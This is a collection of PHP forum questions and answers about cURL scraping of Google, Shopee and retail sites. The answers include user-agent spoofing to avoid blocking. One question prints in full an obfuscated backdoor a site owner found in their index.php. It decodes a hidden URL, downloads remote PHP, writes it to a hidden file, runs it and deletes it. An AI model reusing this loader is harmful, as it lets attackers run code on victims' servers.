//=======Text to Speech==================
function tts($sentence)
{
$fragment = array();
$tmp = explode(" ",$sentence);
$tmp_ = "";
$last_word = "";
foreach ($tmp as $value) {
$tmp_.= "$value ";
$last_word = $value;
if (strlen($tmp_) > 100) {
$last_tmp_.= "";
array_push($fragment, $last_tmp_);
$tmp_ = $last_word." ";
$last_tmp_ = "";
}
$last_tmp_ = $tmp_;
}
array_push($fragment, $last_tmp_);
foreach ($fragment as &$value)
{
$value = str_replace(" ","+",$value);
}
// $sentence = str_replace(" ","+",$sentence);
$name = 0;
foreach($fragment as $value)
{
$url = "https://translate.google.com/translate_tts?tl=en&q=".$value;
if ($name == 0)
$fp = fopen("sound/combined.mp3","w");
else
$fp = fopen("sound/temp".$name.".mp3","w");
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_FILE, $fp);
$data = curl_exec($ch);
curl_close($ch);
fclose($fp);
file_get_contents($url) or die("oops\n");
$name++;
}
$count = 1;
while ($count < $name)
{
file_put_contents('sound/combined.mp3',
file_get_contents('sound/combined.mp3') .
file_get_contents('sound/temp'.$count.'.mp3'));
$count++;
}
$count = 1;
while ($count < $name)
{
unlink("sound/temp".$count.".mp3");
$count++;
}
}
//=========IN=============
if($tts == 'in'){
tts($alias.'.');
$sound = '<embed src="database/sound/inbeep.mp3" width="0" height="0" ><embed src="database/sound/combined.mp3" width="0" height="0" >';
}
When i run the code I go to the error code "oops" which means it failed to create the file, it was working fine yesterday and i haven't changed anything within the code, i dont know if google is blocking the use of the API or something is wrong with my code.
You need to add the user agent string so you aren't told to be coming from CURL. Your code in the loop should be like this:
$url = "https://translate.google.com/translate_tts?tl=en&q=".$value;
if ($name == 0)
$fp = fopen("sound/combined.mp3","w");
else
$fp = fopen("sound/temp".$name.".mp3","w");
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36');
$data = curl_exec($ch);
curl_close($ch);
fclose($fp);
Related
I have a project to make shopee product scraping. Scraping for some products is successful, but if there are thousands of products, only hundreds of products are successful, the rest fail and the error is "forbidden". I've tried using three php methods for scraping, namely curl_init, curl_multi_init, and curl class.
php curl_init() This method returns an array
function scrapcurl($data){
$result = [];
foreach ($data as $key => $value) {
$url = $value;
$ua = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.A.B.C Safari/525.13';
$handle = curl_init();
// Set the url
curl_setopt($handle, CURLOPT_URL, $url);
curl_setopt($handle, CURLOPT_USERAGENT, $ua);
curl_setopt($handle, CURLOPT_HEADER, 0);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, 1);
$output = curl_exec($handle);
curl_close($handle);
array_push($result, $output);
}
return $result;
}
php curl_multi_init() This method returns an array of json in string
ex: {"error":null,"error_msg":null,"data":{"itemid":14513803134,"shopid":40261202,"userid":0,...} then i convert to array associative with another function
function multiRequest($data, $options = array()) {
// array of curl handles
$curly = array();
// data to be returned
$result = array();
// multi handle
$mh = curl_multi_init();
// loop through $data and create curl handles
// then add them to the multi-handle
foreach ($data as $id => $d) {
$curly[$id] = curl_init();
$url = (is_array($d) && !empty($d['url'])) ? $d['url'] : $d;
curl_setopt($curly[$id], CURLOPT_URL, $url);
curl_setopt($curly[$id], CURLOPT_HEADER, 0);
curl_setopt($curly[$id], CURLOPT_RETURNTRANSFER, 1);
// post?
if (is_array($d)) {
if (!empty($d['post'])) {
curl_setopt($curly[$id], CURLOPT_POST, 1);
curl_setopt($curly[$id], CURLOPT_POSTFIELDS, $d['post']);
}
}
// extra options?
if (!empty($options)) {
curl_setopt_array($curly[$id], $options);
}
curl_multi_add_handle($mh, $curly[$id]);
}
// execute the handles
$running = null;
do {
curl_multi_exec($mh, $running);
} while($running > 0);
// get content and remove handles
foreach($curly as $id => $c) {
$result[$id] = curl_multi_getcontent($c);
curl_multi_remove_handle($mh, $c);
}
// all done
curl_multi_close($mh);
return $result;
}
Curl class This method returns an array
use Curl;
function scrap($data)
{
$resultawal=[];
$result=[];
$image=[];
foreach ($data as $key => $value) {
# code...
$curl = new Curl();
$curl->get($value);
if ($curl->error) {
# code...
echo 'Error: ' . $curl->errorCode . ': ' . $curl->errorMessage . "\n";
}
else {
# code...
$js = $curl->response;
foreach ($js->data->images as $key => $value) {
$image["img$key"] = $value;
};
$gambar1 = json_encode($image);
$harga = substr($js->data->price_max, 0, -5);
$stok = $js->data->stock;
$nama = str_replace("'", "", $js->data->name);
$catid = $js->data->catid;
$deskripsi = str_replace("'", "", $js->data->description);
if ($js->data->video_info_list != '') {
$video = $js->data->video_info_list;
$video1 = json_encode($video);
} else {
$video1 = null;
}
$linkss = "https://shopee.co.id/" . str_replace(" ", "-", $nama) . "-i." . $js->data->shopid . "." . $js->data->itemid;
$berat = 0; // berat
$min = 1; // minimum_pemesanan
$etalase = NULL; // etalase
$preorder = 1; //preorder
$kondisi = "Baru";
$sku = NULL;
$status = "Aktif";
$asuransi = "optional";
$item_id = $js->data->itemid;
$resultawal = array(
'item_id'=>$item_id,
'linkss'=>$linkss,
'nama'=>$nama,
'deskripsi'=>$deskripsi,
'catid'=>$catid,
'berat'=>$berat,
'min'=>$min,
'etalase'=>$etalase,
'preorder'=>$preorder,
'kondisi'=>$kondisi,
'gambar1'=>$gambar1,
'video1'=>$video1,
'sku'=>$sku,
'status'=>$status,
'stok'=>$stok,
'harga'=>$harga,
'asuransi'=>$asuransi,
);
array_push($result, $resultawal);
}
}
return $result;
}
My Question
From the three methods above, when the link is thousands, why does a 403 forbidden error appear with methods 1 and 2, and error: 403: HTTP/2 403 with method 3??
Additional info:
Input of the program is thousand of link of products. For example:
5Pcs-pt4115-4115-sot-89-IC-Power-IC-LED-i.41253123.1355347598.sp_atk=09264df0-bb8d-4ca5-8970-719bbb2149dd
and then i take the shopid=41253123 and itemid=1355347598. Then i put to this link:
$link = "https://shopee.co.id/api/v4/item/get?itemid=" . $item_id . "&shopid=" . $shop_id;
and then use three methods above to scrape the product data.
Being the only developer on my server with no one else having access to it, I'm curious to know if hackers can somehow write to php files? I have come across this section of PHP code at the top of my index.php which I am not familiar with and have not put it there myself. I don't know what to make of it or what their attempts are, a little worried. Any advice is appreciated thank you.
<?php
#ini_set('display_errors', '0');
error_reporting(0);
$ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'md5';
$pass = "Zgc5c4MXrLUocQYT5ZtHJf/cM1fWdrpdmmSLH6uToRkH";
if (ini_get('allow_url_fopen')) {
function get_data_ya($url) {
$data = file_get_contents($url);
return $data;
}
}
else {
function get_data_ya($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
}
function wp_cd($fd, $fa="")
{
$fe = "wp_frmfunct";
$len = strlen($fd);
$ff = '';
$n = $len>100 ? 8 : 2;
while( strlen($ff)<$len )
{
$ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n);
}
return $fd^$ff;
}
$reqw = $ay($ao($oa("$pass"), 'wp_function'));
preg_match('#gogo(.*)enen#is', $reqw, $mtchs);
$dirs = glob("*", GLOB_ONLYDIR);
foreach ($dirs as $dira) {
if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; }
$subdirs = glob("$dira/*", GLOB_ONLYDIR);
foreach ($subdirs as $subdira) {
if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; }
}
}
if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); }
fwrite($hdl, "<?php\n$mtchs[1]\n?>");
fclose($hdl);
include("{$eb}.$algo");
unlink("{$eb}.$algo");
?>
I would quarantine your site until you can find how the hacker got access in the first place. Then fix that issue. Removing his code won't stop him coming back if the previous security hole still remains. Its probably from some insecure wordpress plugin.
With regards to the hackers code, it seems to crawl from an arbitrary url and write to your server.
This question already has answers here:
How to solve Fatal error in php
Reference - What does this error mean in PHP?
(38 answers)
Closed 8 years ago.
my project was worked good last year but now the same project is not running properly i haven't change any code but now it is not extracting links from google. Did google has changed any setting for extracting links form it..
my codes are follows
<?php
if(isset($_POST['operation']))
{
$op = $_POST['operation'];
$start = time();
if($op == 'search_crawler')
{
if(isset($_POST['text']))
{
include_once('mysqllibrary.php');
mysqlStart();
$start = time();
$text = $_POST['text'];
//Get the words from the text
$words = explode(" ",$text);
$query = "SELECT t1.url url,t1.content content,t2.number_of_clicks number_of_clicks FROM tbllinks t1,tblclicks t2 WHERE t1.id=t2.lid ORDER by t2.number_of_clicks DESC";
$res = searchDatabase($query);
$found = 0;
if(sizeof($res) > 0)
{
for($count=0;$count<sizeof($res);$count++)
{
$content = $res[$count]['content'];
$content_count = 0;
$url = $res[$count]['url'];
for($count2=0;$count2<sizeof($words);$count2++)
{
if(strstr(strtolower($content),strtolower($words[$count2])) === false)
{
}
else
{
$content_count = $content_count + 1;
$found = 1;
}
}
if($content_count > 0)
{
echo "<a href='add_user_url.php?user_id=$user_id&url=$url'>$url</a><br/>";
}
}
}
$end = time();
if($found == 1)
{
echo "<hr/>Time needed for output from crawler:" . ($end-$start) . " ms<hr/>";
}
}
}
else if($op == 'search_crawler2')
{
if(isset($_POST['text']))
{
include_once('simple_html_dom.php');
$text = $text . " audio video images";
$text = str_replace(' ','+',$_POST['text']);
$user_id = $_POST['user_id'];
$file_name = 'test.txt';
$ch = curl_init("https://www.google.com/search?q=" . $text);
$fp = fopen($file_name, "w");
$start = time();
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
curl_exec($ch);
curl_close($ch);
fclose($fp);
$html = file_get_html($file_name);
// Find all links
foreach($html->find('a') as $element)
{
$url = $element->href;
$index = strpos($url,'q=https://');
if($index > 0)
{
$index2 = strpos($url,'webcache');
if($index2 === false)
{
$index2 = strpos($url,'sa=U');
$url = substr($element->href,$index+2,$index2-$index-3);
echo "<a href='add_user_url.php?user_id=$user_id&url=$url'>$url</a>";
echo '<br/>';
}
}
}
$end = time();
echo "<hr/>Time needed for search output:" . ($end-$start) . " ms<hr/>";
}
}
else if($op == 'search')
{
if(isset($_POST['text']))
{
include_once('simple_html_dom.php');
$text = $text . " audio video images";
$text = str_replace(' ','+',$_POST['text']);
$user_id = $_POST['user_id'];
$file_name = 'test.txt';
//$ch = curl_init("https://in.yahoo.com/search?q=" . $text);
$ch = curl_init("https://www.google.com/search?q=" . $text);
$fp = fopen($file_name, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
sleep(4);
curl_exec($ch);
curl_close($ch);
fclose($fp);
$html = file_get_html($file_name);
// Find all links
foreach($html->find('a') as $element) //---this is line no 130
{
$url = $element->href;
$index = strpos($url,'q=https://');
if($index > 0)
{
$index2 = strpos($url,'webcache');
if($index2 === false)
{
$index2 = strpos($url,'sa=U');
$url = substr($element->href,$index+2,$index2-$index-3);
echo "<a href='$url'>$url</a>";
echo '<hr/>';
}
}
}
$end = time();
echo "<hr/>Time needed for search output:" . ($end-$start) . " ms<hr/>";
}
}
}
?>
While running the codes on local host it is showing an error of--
( ! ) Fatal error: Call to a member function find() on a non-object in
C:\wamp\www\crawler_based_search_engine\ajax_requests.php on line 130
# Time Memory Function Location
1 0.0151 162928 {main}( ) ..\ajax_requests.php:0
because of this error my program is not fetching the links from the google
I am having a bit of trouble with some code where in an array I have a list of 2 and the function is only displaying the last in the list.
Here is the code:
<?php
function getKeywordPosition($theurl,$thekeywords) {
$theurl = $theurl;
$thekeywords = $thekeywords;
$found = false;
$x = 0;
for($x; $x < 64 && $found == false;)
{
$url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&"
. "q=".stripslashes(str_replace(' ', '%20', $thekeywords)).'&start='.$x;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_REFERER, 'http://www.boo.com');
$body = curl_exec($ch);
curl_close($ch);
$json = json_decode($body);
$x4 = $x + 4;
$old_x = $x;
for($x; $x < $x4 && $found == false; $x = $x + 1)
{
if (strpos($json->responseData->results[$x-$old_x]->unescapedUrl, strtolower($theurl)) !== false)
{
$found = true;
}
}
// now have some fun with the results...
}
if($found)
{
echo '<strong>'.$theurl.'</strong> is located as the <strong>'.$x.'</strong> result when searching for <strong>'.stripslashes($thekeywords).'</strong>';
echo '<br>';
}
}
$list = array('php.com'=>'php', 'php.com'=>'php');
foreach($list as $key => $value){
getKeywordPosition($key,$value);
}
?>
Why is this not working properly?
Unless this is a badly contrived example, then th issue is you have duplicate keys in your array:
$list = array('php.com'=>'php', 'php.com'=>'php');
This array has a single entry
You coud refactor like so:
$list = array(
array('url'=>'php.net', 'keyword'=>'php'),
array('url'=>'php.net', 'keyword'=>'arrays'),
array('url'=>'php.net', 'keyword'=>'anotherkeyword')
);
foreach($list as $entry){
getKeywordPosition($entry['url'], $entry['keyword']);
}
I am trying to crawl images from a website using PHP.
The page that I am trying to crawl is:
http://www.reebonz.com.sg/event/t7349#/event/t7349
But using my code I only get the href of my header. My code is:
<?php
require_once ('function.php');
$advt_id = "88477";
$programurl = "http://www.reebonz.com.sg/event_list/1/";
$baseurl = "http://www.reebonz.com.sg/event_list/1/";
$crawl_data []= array ( "department" => 0, "category" => "bags" , "advt_cat" => "BALENCIAGA", "cat_url" => 'http://www.reebonz.com.sg/event/t7349#/event/t7349');
$data = get_data($url);
$product_raw = splice_data ($data, 'ul class="rec-items-ul ng-scope"',1, '</ul>',1);
$product_list = splice_list ($product_raw, 'href="', '"');
echo "\n**** Got Product List ".count($product_list)." ***\n";
print_r ($product_list);
foreach ($product_list as $product)
{
if ((strlen($product) < 10))
{
echo $product;
continue;
}
$url = $baseurl.$product;
$data = get_data($url);
$img_data = splice_data ($data, 'class="rbz_product-zoom-image row"', 1, '</div>', 1);
$img_url = splice_data ($img_data, 'href="',1, '"', 1);
echo $img_url;
$filePath = $crawl_cat['category']."\\".$crawl_cat['advt_cat'];
if (!file_exists($filePath)) {
mkdir($filePath, 0777, true);
}
grab_image($img_url,$filePath);
//grab_image($img_url5,$filePath);
echo "*";
}// end of product insert for
?>
the function.php is:
function splice_data ($data, $startstr, $startoccur, $endstr, $endoccur)
{
if ($startoccur > 1)
{
for ($i = 1, $startpos = 1 ; $startoccur >= $i; $i++, $startpos++)
{
$startpos = stripos($data,$startstr,$startpos);
//echo $startpos. "\n";
}
$start = $startpos;
}
else
$start = stripos($data,$startstr,$startoccur);
$start_index = strlen($startstr);
$end = stripos($data,$endstr,$start + $start_index ) ;
$splice_data = substr($data,$start + $start_index, $end - ($start + $start_index) );
return $splice_data;
}
function splice_list ($img_data, $start_str, $end_str, $find = '', $replace = '')
{
for ($i = 1, $j = 1; stripos($img_data,$start_str,$i) > 1 ;)
{
$start = stripos($img_data,$start_str,$i);
$start_len = strlen($start_str);
$end = stripos($img_data,$end_str,$start + $start_len) ;
$data_list[] = str_replace($find,$replace,substr($img_data, $start + $start_len , $end - $start - $start_len)) ;
$i = $end;
$j++;
}
$result = array_unique($data_list);
return $result;
}
function get_data($url, $ckfile="", $cookie="")
{
$toCheckURL = $url;
// This all sets up the CURL actions to check the page
$header=array(
// 'User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language: en-us,en;q=0.5',
'Accept-Encoding: gzip,deflate',
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Keep-Alive: 115',
'Connection: keep-alive',
);
$proxies = array();
$ch = curl_init();
if (isset($proxy)) { // If the $proxy variable is set, then
curl_setopt($ch, CURLOPT_PROXY, $proxy); // Set CURLOPT_PROXY with proxy in $proxy variable
}
curl_setopt($ch, CURLOPT_URL, $toCheckURL);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_NOBODY, false);
if (isset($ckfile) && $ckfile !="" and !empty($ckfile))
{
curl_setopt ($ch, CURLOPT_COOKIEFILE, $ckfile);
}
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT,60);
curl_setopt($ch, CURLOPT_TIMEOUT,90);
curl_setopt($ch, CURLOPT_MAXREDIRS, 10); //follow up to 10 redirections - avoids loops
if($cookie != "")
curl_setopt($ch,CURLOPT_HTTPHEADER, array($cookie));
curl_setopt($ch,CURLOPT_USERAGENT,$agents[array_rand($agents)]);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
The output that I get now is:
**** Got Product List 8 *** Array ( [0] => //netdna.bootstrapcdn.com/twitter-
bootstrap/2.3.2/css/bootstrap-combined.no-icons.min.css [1] => //netdna.bootstrapcdn.com/font-
awesome/3.2.1/css/font-awesome.css [2] =>
http://www.reebonz.com.sg/sites/all/themes/custom/octopus2/xfavicon.ico.pagespeed.ic.jT8Y7LgYBc.png
[3] => http://www.octopus2.local/sites/all/themes/custom/octopus2/css/reebonz-ie.css [4] =>
http://www.reebonz.com.sg/sites/all/modules,_contrib,_jquery_update,_replace,_ui,_themes,_base,_minified,_jquery.ui.core.min.css,qn1a78z+modules,_contrib,_jquery_update,_replace,_ui,_themes,_base,_minified,_jquery.ui.theme.min.css,qn1a78z+modules,_contrib,_jquery_update,_replace,_ui,_themes,_base,_minified,_jquery.ui.slider.min.css,qn1a78z+modules,_contrib,_panels,_css,_panels.css,qn1a78z+modules,_custom,_mailcheck,_css,_mailcheck.css,qn1a78z+themes,_custom,_octopus2,_css,_bootstrap.css,qn1a78z+themes,_custom,_octopus2,_css,_reebonz-core.css,qn1a78z+themes,_custom,_octopus2,_css,_reebonz-social-network.css,qn1a78z+themes,_custom,_octopus2,_css,_reebonz-....
What is wrong with my code?Is there any simple way to do this??
use php DomDocument:
$doc = new DOMDocument();
$doc->loadHTML(your_html_code);
$images = $doc->getElementsByTagName('img');
foreach ($images as $img) {
//do whatever you like
}
Download this library : http://sourceforge.net/projects/simplehtmldom/
And the below code will work
(include that library in top)
<?php
error_reporting(1);
include_once('simple_html_dom.php');
$html = new simple_html_dom();
$html->load_file('https://www.google.co.in/search?q=shahrukh+khan&newwindow=1&biw=1375&bih=791&source=lnms&tbm=isch&sa=X&sqi=2&ved=0ahUKEwi1rO6AjZrKAhWSBY4KHWSGBDQQ_AUIBygC');
$reviews = $html->find('img');
$fetched_images = '';
foreach($reviews as $link)
{
//find review ID if not null
if($link->{'src'} != ''){
$review_ID = $link->{'src'};
$fetched_images[] = $review_ID;
}
}
?>
<ul>
<?php foreach ($fetched_images as $fetched_image): ?>
<li style="display:inline-block"><img src="<?php echo $fetched_image;?>"></li>
<?php endforeach ?>
</ul>
<?php
include_once('simple_html_dom.php');
$target_url = "Your URL here";
$html = new simple_html_dom();
$html->load_file($target_url);
$images = $html->find('img');
/**foreach($images as $link){
//find review ID if not null
if($link->{'src'} != ''){
$image_ID = $link->{'src'};
$fetched_images[] = $image_ID;
}
}*/
foreach ($images as $fetched_image){
echo $fetched_image;
}
?>